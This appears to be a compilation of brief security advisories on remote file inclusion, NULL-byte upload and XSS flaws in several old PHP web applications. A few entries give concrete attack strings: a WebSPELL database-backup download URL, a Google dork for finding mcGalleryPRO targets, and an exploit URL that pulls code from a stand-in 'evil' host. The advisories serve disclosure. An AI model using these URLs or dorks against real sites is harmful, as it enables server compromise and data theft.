A remote file include vulnerability exists in Vitrax Premodded phpBB. An attacker can exploit this vulnerability to include arbitrary files from remote locations by sending a specially crafted HTTP request containing directory traversal characters. This can be exploited to execute arbitrary PHP code by including files from external sources that contain malicious code.
An attacker can download the database backup of the WebSPELL CMS by accessing the URL http://[SITE]/[PATH]/admin/database.php?action=write&userID=1
A vulnerability exists in Popper v1.41 which allows remote attackers to include arbitrary files via a URL in the form parameter to childwindow.inc.php. This can be exploited to execute arbitrary PHP code by including a URL pointing to a malicious PHP script.
p4CMS version 1.05 is vulnerable to a remote file inclusion vulnerability due to a lack of proper sanitization of user-supplied input in the 'abs_pfad' parameter of the 'abf_js.php' script. An attacker can exploit this vulnerability by sending a malicious URL in the 'abs_pfad' parameter, which will be executed on the vulnerable server.
The poison NULL byte vulnerability for Perl CGI applications was described in [1]. ShAnKaR noted that the same vulnerability also affects various PHP applications. Examples of vulnerable applications are phpBB and punBB. The vulnerability can be used to upload or replace arbitrary files on the server, e.g. PHP scripts, by adding a 'poison NULL' (%00) to the filename. In the case of phpBB and punBB, the vulnerability can be exploited by changing the location of the avatar file and uploading an avatar file with PHP code in EXIF data.
A vulnerability in PhpLinkExchange allows remote attackers to include arbitrary files from remote locations and execute arbitrary code. It is also possible to inject arbitrary web script or HTML via the msg parameter.
WTools v0.0.1-ALPH is vulnerable to a Remote File Include vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server, which will then include and execute the malicious file.
Invalid include calls in fileloader.php on lines 5, 6 and 7: the value of '$config["openi_dir"]' is not guaranteed when including files. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing a URL to the vulnerable fileloader.php script with the malicious code in the 'config[openi_dir]' parameter.
Input passed to the "path_to_folder" parameter is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. Google dork: "powered by mcGalleryPRO". Exploit: http://somehost/path_to_mcgallerypro/random2.php?path_to_folder=http://evil
Open Bulletin Board 1.0.8 is vulnerable to multiple remote file include vulnerabilities. An attacker can exploit these vulnerabilities by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to execute arbitrary code on the server.